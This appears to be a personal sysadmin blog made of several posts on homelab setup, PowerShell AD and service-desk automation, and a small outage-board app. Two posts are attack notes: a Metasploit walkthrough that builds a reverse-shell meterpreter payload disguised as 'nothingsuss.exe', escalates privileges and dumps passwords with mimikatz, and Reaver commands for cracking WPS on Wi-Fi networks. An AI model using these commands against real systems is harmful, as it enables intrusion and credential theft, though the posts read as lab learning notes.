Syncthing, for syncing things. and other things

Some things i’ve done in the last couple months

  • Installed ESX on an old HP Z210, core i7-2600 with 4 gb of ram
    It’s running CentOS 7, Windows 10, and Kali VMs simultaneously, which is surprising given the only 4 gb ram. They all run extremely well, had no useability issues even with the Win 10 machine running Chrome and 20 tabs. i’ve only allocated a gig of ram to Win 10, 768mb each for Kali and CentOS.
  • On CentOS i’ve set up an anonymous Samba share, which was a pain because since Win10 1803 (or thereabouts) you can no longer connect anonymously/as guest to shares by default. You have to jump into gpedit on Win10 and enable a policy:
    Computer configuration\administrative templates\network\Lanman Workstation
    “Enable insecure guest logons”


    Having said that, it’s really bad practice – should be following the Samba set up for CentOS 7 on Linuxize, not doing whatever i did.
  • I’ve set up Syncthing on CentOS to point to the open Samba share, so files dropped in that share are synced to my phone.
    prit coo’.
    Syncthing was pretty straightforward, just follow the docs – search for firewall, port forwarding, in the docs.
  • Installed TeX Live and TeX Studio (Win 10) to compile some LaTeX templates off Overleaf. Feels like installing the TeX Live is way too much messing around (6 gig download for the default install 😓) when you can you just modify the template directly on Overleaf. LaTeX is a great way to produce good looking documents though.
Advertisements

use python to scrape a site and not look like a bot

can’t find the python i wrote to do this…lucky it’s super simple

something something python requests, but construct a user-agent string to supply with the request first….

use any generic browser user agent string, eg. Chrome version 75 on Windows 10:

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36

User-agent parsing breakdown can be found on WhatIsMyBrowser.com

Choose a specific user-agent here (same site)

then do something with the return in Beautiful Soup or regex or something something…

msfconsole notes

This is another notes dump, just spitting out what i was doing and my thoughts at the time i was doing it.
I hit a few roadblocks because i was trying this on a fully patched Win 10 1903 machine. Would probably have more luck on Windows 7 or (lol) XP.

# create a meterpreter payload (just an exe) to run on the target windows machine
msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform win -f exe LHOST=192.168.0.187 LPORT=4444 -o /root/nothingsuss.exe

# if you're targeting a 64 bit machine use this
msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 –platform win -f exe LHOST=192.168.0.187 LPORT=4444 -o /root/nothingsuss.exe

# if you're not sure, maybe go 32 bit and then inject the 64bit version if it turns out it's 64 once you're in a meterpreter shell
use windows/local/payload_inject
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.0.187
set LPORT 4445

# startup msfconsole and open a handler for the payload type, in this case meterpreter
# if you have a x64 payload, use a x64 listener here, ie windows/x64/meterpreter/reverse_tcp
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.187
set LPORT 4444
exploit

# run nothingsuss.exe on the target machine

# check/elevate to SYSTEM
# run the .exe (generated from msfvenom above) on the target machine as admin, or else getsystem probably wont work
getuid
getsystem

# is this machine x86 or x64? need to run the correct version of mimikatz or most functions wont work
sysinfo

# list processes
ps

# migrate to one and, right now, pray it's correct?
# run post/windows/manage/migrate ?
migrate

# crank up mimikatz
load mimikatz

# check privileges , we're looking for 20 OK
# probably dont need this step since it's running in meterpreter as SYSTEM (hopefully)
mimikatz-command -f privileges::debug

# if not, elevate
# is this mimikatz-command -f token::elevate ?
# can't remember
token::elevate

# might need to do it a couple times
token::elevate

# now try dump plaintext passwords
msv
kerberos
mimikatz-command -f sekurlsa::searchPasswords
mimikatz-command -f sekurlsa::logonpasswords

# or get a hashdump. im guessing you then feed this to hashcat?
mimikatz_command -f samdump::hashes

# yay you probably did it!
mimikatz_command -f coffee

# didnt work, didnt have escalation to system
# - use load kiwi instead of mimikatz?
# - background the meterpreter session and USE another exploit
# - enter something liek: search platform "windows 10" type:exploit rank:excellent
# - tried exploit/windows/local/lenovo_system update on the open meterpreter session but not elevated
# - could be worth a look again

#-----------------------------------------------------------------------
#-----------------------------------------------------------------------
#-----------------------------------------------------------------------
#-----------------------------------------------------------------------
#-----------------------------------------------------------------------
#-----------------------------------------------------------------------
#Invoke-mimikatz exists as part of PowerSploit, which looks amazing
#-----------------------------------------------------------------------
#-----------------------------------------------------------------------
#-----------------------------------------------------------------------

#after hashdump in meterpeter, copy the hash you want to crack and #feed to to haschat to check against a wordlist
# -m specifies hash type (1000 is NTLM) -a is dictionary attack, rest is obvious
hashcat -m 1000 -a 0 -o output.txt aad3b435b51404eeaad3b435b51404ee /usr/share/metasploit-framework/data/wordlists/password.lst

#dont forget kiwi_cmd in meterpreter
#
#
#dont forget your meterpreter payload needs to match the architecture target system 
# if your shell dies everytime it exploits a 32bit machine, swap to 64 bit meterpreter payload


Protip: look up MS10-022 module in metasploit and have a crack at an XP machine (pre Service Pack 3 i think)

some potentially useful powershell lines

or not useful. interesting-ish i think, in that they can be expanded on and cleaned up to become full-blown useful.

  • Use SYDI cscript to get server.xml, convert that to JSON (codebeautify.org) and then convert that to a powershell object.
    There are probably easier ways to get all your servers’ properties as pliable objects, but this is one way.
$json = Get-Content -Raw -Path "C:\temp\trash\server.json" | ConvertFrom-Json

# go nuts on your $json server object
# awesome
$json.computer.processes.process #etc.



  • This young fellow will retrieve the password expiry dates of all AD-Users.
    Probably pipe this badboy to export-csv
######get the expiry date of passwords:
Get-ADUser -filter {Enabled -eq $True -and PasswordNeverExpires -eq $False} –Properties "DisplayName", "msDS-UserPasswordExpiryTimeComputed" |
Select-Object -Property "Displayname",@{Name="ExpiryDate";Expression={[datetime]::FromFileTime($_."msDS-UserPasswordExpiryTimeComputed")}}



  • If a locked out user(s) is found, their username will be sent to the specified address in an email. How about that.
#counter -le 100 specifies that it will check a hundred times
for ($counter = 1;$counter -le 100; $counter++){
Search-ADAccount -lockedout | foreach {$_.samaccountname} {
send-MailMessage -SmtpServer "MAILSERVER" -To "joe.pesci@detrocity.net" -From "daniel.stern@detrocity.net" 
-Subject "This person is locked out" $_.samaccountname | Out-String};
search-ADAccount -lockedout | select samaccountname;
 
#change the number here to adjust checking frequency - 600000 is 10 minutes
write-host(Start-Sleep -Milliseconds 600000)}
  • A variation of this below prints a timestamp and name to the powershell output, rather than emailing.
for ($counter = 1;$counter -le 1000; $counter++){
$Time = Get-Date;write-output(search-adaccount -lockedout | select Name, samaccountname | Format-Table -AutoSize);
write-host(Start-Sleep -Milliseconds 10000);
write-host($Time.ToString("`n-----------------------------`nyyyy/MM/dd - HH:mm:ss`n-----------------------------"))}



  • Fill out a list of newline delimited computer names, and feed it to this script.
    It’ll use Get-WMIObject Win32_ComputerSystem, _BIOS, _OperatingSystem, etc. to return the details you’ve requested for each machine and then dump it in a csv.
    Obviously easily modifiable to get whatever WMI properties you want.
$Computers = Get-Content "C:\Temp\listofcomputernames.txt"
 
$Output = ForEach ($C in $Computers){
$System = Get-WmiObject Win32_ComputerSystem -ComputerName $C | Select-Object -Property UserName,Model
$BIOS = Get-WmiObject Win32_BIOS -ComputerName $C | Select-Object -Property SerialNumber
$Time = icm $C {get-date -Format g}
 
[PSCustomObject]@{
        ComputerName = $C
MachineName = ($C | Out-String).Trim()
UserName = ($System.UserName | Out-String).Trim()
SerialNumber = ($BIOS.SerialNumber | Out-String).Trim()
Model = ($System.Model | Out-String).Trim()
Time = ($Time | Out-String).Trim()
}
} $Output | Export-CSV -Path "C:\Temp\machine_details.csv" -NoTypeInformation

 

  • There’s others, but they’re too dirty for public consumption

using Reaver to crack a WPS key

I was going to write more of a guide on this but it was so long ago i can’t even remember the specifics.

I’ve had these notes following me around like a hit to my credit rating for like 7 years so i’m just going to dump them and run:

# start monitor mode on card:
airmon-ng start wlan1
 
# you'll get a monitor interface default named mon0 
# check WPS enabled networks around with wash:
wash -i mon0


# or airodump to check networks in general
airodump-ng mon0


# pick the BSSID, feed it to reaver and wait
# Example: 
reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv

# 
# -vv is verbosity of on screen messages
# --channel to specify channel
# -d to set delay between pin attempts
# -t to set receive timeout
# --no-nacks if its not wokring, cant remmeber what it does
#  all parameters explained via reaver --help

#monitor interface needs to be started on the same channel as the network you're trying to break

ez peas

ZWAMP! and the dirt is gone

So I wanted a wiki I could document useful things in, because I completely forgot about this blog.

I wanted it to be pickup-and-move-able in case i ever had to zip it and run from the machine I was using (in case i get fired and don’t see it coming obv). So i googled “super lightweight apache web server” and picked the fifth result: ZWAMP

In hindsight this was a poor decision, because my next search was for a super lightweight wiki – Docuwiki fit the bill, but the latest version of it needs PHP 5.6 at minimum.

ZWAMP includes Apache with vhosts, MongoDB, MySQL, probably some other stuff, but foremost in my hastily elicited requirements, PHP.

HOWEVER.

ZWAMP only supports up to PHP 5.4 currently so I had to get an old version of docuwiki still supporting PHP 5.4 and install that. It’s probably supes insecure, but I’m not planning on ever exposing it to the internet.
Security is always a concern but I scrape through as a millenial, so convenience is key. This is also why i grow my own avocados (hint, i fucking don’t).

Back on the train: ZWAMP running on startup and Docuwiki run pretty smooth and work ok as a wiki. Docuwiki was unintuative to me at first, possibly because i’ve never seen the backend of a wiki. I ended up installing a few plugins to make life easier:

Really they just made it easier initially to organise the pages – now that I get the namespace/page syntax, it’s actually extremely easy, but I’m a simpleton, or I like doing things the easy way, or something, so I’m sticking with using and recommending these plugins.

After I got it up and running I got scared of losing it all running from the one folder and the one machine, so I set out to mirror the whole shebang to a cloud service. Actually i didn’t set out to do that, I just happened to come across Syncthing and thought it sounded interesting. Syncthing basically markets itself as a private user-provides-hardware cloud service.

So now im using Syncthing to mirror the changes to my phone as an intermediary device, and then from there to wherever my heart desires.

Once I’d done this, I landed on a few obvious questions I could have asked prior to expending all this effort:

  • Why not use a pre-established cloud service like OneDrive or Google Drive, Dropbox, SpiderOak, etc.
  • Why even bother syncing website files between folders? Just host a wiki on a website on a server like a normal person, and have a single source of truth, as opposed to introducing the inevitable file conflicts awarded by a hastily thrown together private cloud service?

Fuck iiiiit, I do what I want

exporting out of SCSM – clawing back incident and request information

It actually wasn’t difficult at all, after 2 hours of googling and learning what it was I was actually looking for. System Center Service Manager is a beast that can do a lot, particularly with a finely tuned frontend (which I’ll refer to as it’s ‘skirt’ in this post) glued to it’s nether.

Ironic that clippy should be suggesting this. But Microsoft open sourced calc.exe the other day and even run Linux natively now so...who knows...

The flipside is the cost of maintaining the skirt and customisations. I can passably modify or write HTML and Javascript to produce some things of use but from my brief view of SCSM (and it’s Cireson skirt) making a simple change requires full webdev abilities far beyond a service desk normie like myself. Suffice it to say the cost of getting a contractor in just to add a field to a request form (or say, a pocket to a skirt) is not worth it for a smaller enterprise. It’s almost a full time position improving and modifying Cireson for a frequently changing environment.

I can see on the scale of thousands of employees, it would be worth it for the time-savings brought on by the automation it can offer. Or even if the project to put it in started with meticulously gathered and extremely well defined requirements, such that Cireson themselves could sew that whole skirt for you on the spot without requiring any additional measurements or improvements. But in the vein of continuous improvement brought on by frequently changing use cases, it looks (to me, don’t sue me) to be an extremely expensive pursuit for something easily covered by a one-size-fits-all moomoo. It’s also (IMO) heaps expensive.

But anyway, what do I know.

Here’s how to export your incidents out of SCSM to a CSV.

  1. Make sure you have SMLets installed on the SCSM server.
  2. Open up a Powershell window on the SCSM server.
  3. Run these lines, modifying the file path to where you want your .CSV to come out:

import-module SMLets

get-scsmincident | Select-Object -Property ID, Status, Title, @{l='Description';e={$_.Description -replace "`n"," "}}, AffectedUser, AssignedTo, CreatedDate, TierQueue, Urgency, Priority | export-csv C:\temp\SCSM_Incidents.csv -nti

Super easy. You might be saying, gross, what’s that part in the middle with the Description property? Well most Incident descriptions will contain a carriage return which export-csv identifies as a delimiter, chopping off the rest of the description after the first carriage return.

With @{l=’Description’;e={$_.Description -replace “`n”,” “}} you will replace all carriage returns in the description with spaces, retaining all that preciously descriptive information. I could describe my lawn in the request, in perfect detail, and you’ll get it.

You can see properties I’ve opted to keep in the select-object -properties. If you want to see all the available fields, just pipe get-scsmincident straight to export-csv and have a look at the resulting file – then you can edit the command above to include the extra columns you want.

Exporting all the Service Requests was slightly harder because the affected user doesn’t seem to be stored in the Service Requests class – it strikes me as painfully obvious that it should be but I reiterate: what do I know? For some reason you have to get that information from the Relationship class and then the way I joined them was to stick them in Excel sheets and do a VLOOKUP to cross-reference the request ID to the Affected User.

Here’s how to export your service requests out of SCSM to a CSV.

  1. Make sure you have SMLets installed on the SCSM server.
  2. Open up a Powershell window on the SCSM server.
  3. Run these commands:
import-module SMLets

$SRClass = Get-SCSMClass System.WorkItem.ServiceRequest$

Get-SCSMObject -Class $SRClass | Select-Object -Property ID, Status, Urgency, Priority, Title, @{l='Description';e={$_.Description -replace "`n"," "}}, Notes, CreatedDate, SupportGroup | export-csv C:\temp\SCSM_Service_Requests.csv -nti

$Relclass = Get-SCSMRelationshipClass System.WorkItemAffectedUser

Get-SCSMRelationshipObject $Relclass | Export-Csv C:\temp\SCSCM_SR_Affected_User.csv -nti

You will see that this gives you two files which you can now open up and do a VLOOKUP on. There are other values you can get this way – one such useful one which I did not get (but you could!) is the System.WorkItemAssignedToUser which will tell you which technician it has been assigned to.

You could grab this by substituting System.WorkItemAssignedToUser in the place of System.WorkItemAffectedUser in the lines above. Obviously then you’d have yet another CSV to do another VLOOKUP on, but it should work. And more importantly, I couldn’t find an easier way.

sdp powershell automation – at least that was the intent

Manage Engine ServiceDeskPlus has an option to call cmd.exe (and by extension any command line tools from there) which you can use to crank out some automation from a submitted service request.

If you open up SDP Admin and head on over to Custom Triggers, or I think Business Rules, you can set up an action to this effect:

cmd /c powershell.exe -WindowStyle Hidden -file D:\ManageEngine\ServiceDesk\integration\custom_scripts\test_add_distribution_group_member.ps1 "$COMPLETE_JSON_FILE"

Should be obvious that this runs Powershell in a hidden windows and hands it $COMPLETE_JSON_FILE which is a capture in JSON format of the available fields (including any custom ones you’ve added) which are created as part of a request in SDP. To funnel the JSON into the Powershell script your .ps1 file needs to open with the following (ie. this should be the very first line in the script):

param ( 
[string]$json = "none" 
)

To get this into a useable Powershell object (because objects are the whole point of Powershell) you want to pipe it into a new object thusly:

$data = Get-Content -Raw $json | ConvertFrom-Json

Now you’ve got yourself a friendly old buddy called $data containing all of the properties of the request. You can access the properties with $data.request.name or $data.request.subject, $data.request.customfield, etc.

I’ve tried to automate adding someone to a distribution group by installing Exchange Management Tools on the server and calling the cmdlet for updating a distro group per below:

$name = $data.request.login_name
$name = $name + '@domain.com.au'

#and what distribution group they want to be added to ('Distribution Group' is a custom field added to the request form)
$dgroup = $data.request.'Distribution Group'

#import exchange tools (have to install Exchange Management Tools on the server
Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn

#add to the group
Add-DistributionGroupMember -Identity $dgroup -Member $name

Unfortunately this doesn’t work completely yet, it throws a permissions error – I think it’s because the user running Powershell is the ServiceDeskPlus service account, which doesn’t have the appropriate privileges. Still working on it, but it looks like it should work once that’s sorted.

When I googled the error thrown by Powershell initially it led me to go into AD and allow the Exchange Trusted Subsystem to have modify permissions on all objects – I thought that would fix it at first but alas! It did not.

I’ve also tried to automate updating AD photos – that’s not working either but by George i’ll keep trying until it all goes down the same hole.

Here’s where I’m at with that one:

#paste this pipe to an actual file to see what JSON youre receiving
#| Out-File "D:\ManageEngine\ServiceDesk\integration\custom_scripts\SDP_test_data_AD.json"

####start actual script

#receive a parameter, should be a JSON file from SDP ($COMPLETE_JSON_FILE)
param (
    [string]$json = "none"

 )

#get it and turn it into a powershell object #put -Raw back in get-content and the convert from right after the get-content
$data = Get-Content -Raw $json | ConvertFrom-Json

#can print the request object info with
#$data.request
#subsequent items 
#$data.request.subject

#images pasted into a submitted request go to  /inlineimages/WorkOrder/*REQUESTID*/*UNIXTIMESTAMPINMILLISECONDS*.png
#could try if theyre attached they go to /fileAttachments/request/*MONTHYEAR*/*REQUESTID*/*ATTACHMENT_NAME*.EXT
#think its easier to get the images if they were pasted into the request rather than attached

#could specify the path to the photo like this 
$requestID = $data.request.workorderid
$photoPath = "D:\ManageEngine\ServiceDesk\inlineimages\WorkOrder\" + $requestID + "\*"

#then get the actual file like this
#there should only be one file in this directory, looking for either a png or a jpg
$photoFile = Get-ChildItem -Path $photopath -Include *.jpg,*.png

#then do this part to get the image as a byte file or something, i dont know
$photo = [byte[]](Get-Content $photoFile -Encoding byte)

#then get the user
$username = $data.request.login_name

#then set their profile photo to the one we just grabbed
############ NEED TO IMPORT-MODULE ACTIVEDIRECTORY before this will work
############ the module isnt available in get-module -listavailable
Import-Module ActiveDirectory
Set-ADUser $username -Replace @{thumbnailPhoto=$photo}

#need AD computers and users module maybe?
#questions/issues: 
#
#if we set it in AD does it then push out to the rest (exchange, skype, sharepoint)
#maximum file size is 100kb and 96x96 - what happens if it's too large?
#could use this script to resize it? https://gallery.technet.microsoft.com/scriptcenter/Resize-Image-A-PowerShell-3d26ef68

Again it looks alright to me, but this also throws permissions errors – need to look at permissions for the SDP service account, or else try run the Powershell as another, privileged, user/service account.

the outageboard

A few months ago I whipped up (I say “whipped”, it took about 16 hours) an outage board style tool to capture some information about current or impending (ie, unscheduled or scheduled) outages. Unfortunately my zero UX skills and weak attempt at programming has resulted in something that is visually pleasing in neither the front nor backend but, granted, which does function as a basic outage board.

This badboy is written in Visual Studio 2017, C# MVC and HTML + Javascript. It basically uses the StreamWriter class to write to a CSV file when you add an outage, and then uses StreamReader to populate the table with the contents of that CSV. This done properly would connect to a database rather than a flat text file but here we are.

This could easily be adapted to any other use for sharing communal or department-wide information, eg. Listing invoices that have come in and what actions have been taken against them – just rename the table headings to something like Invoice ID, Date Received, Amount, Due Date, Forwarded To, etc.

This is the dazzling frontend:

Captures basic info and lets you delete an outage based on the Outage Ref.
The outage reference is generated by using the first 6 characters of a GUID generated in the C#.

To match the Outage Ref string and delete the line/data associated with it, I pulled (copied) basically the entire class from an answer from a lad named HĂ„vard FjĂŠr on this StackOverflow topic:

https://stackoverflow.com/questions/668907/how-to-delete-a-line-from-a-text-file-in-c

If you click the Add Advisory button you get this cute little form where you can specify the details of the outage you want to add – and get this, it will PRE-POPULATE the current time and date in there for you! If that’s not a consumer-focused enhancement, I don’t know what is!

The actual C# operating in the background is revolting, and the CSS to format these somewhat decent looking (if i say so myself) buttons is sloppy as *redacted*, but it’s tight, it works, that’s all I need.

Also if you put a comer in the ETR or Outage Details it will throw another random column in the table for you – sweet bug but it’s mine so I’ll keep it.

Odds that i’ll ever improve this to be something viable enough to live outside of my own code graveyard are slim to none, especially given we don’t even use it in the workplace I built it for. But it could be useful one day (like if there was no outage-board solution at all) so I wont shift-delete the project just yet.

If anyone wants the source I’ll put it somewhere, but I strongly urge you to look elsewhere for a quality solution first. If you end up actually making use of it, beyond as a submission to Coding Horror or a cautionary tale for new programmers, ill be very surprised, but also pleased…..no pleased isn’t a strong enough word. I’ll find it pleasurable.

The IIS_IUSRS account needs read/write/create on the C:\inetpub\wwwroot directory to create the CSV and write to it.

I had no idea what I was doing when I created it, so this project is version controlled in Azure Devops using TFS.

Would rather git but I couldn’t easily convert it and it’s fair to say I still don’t know what I’m doing.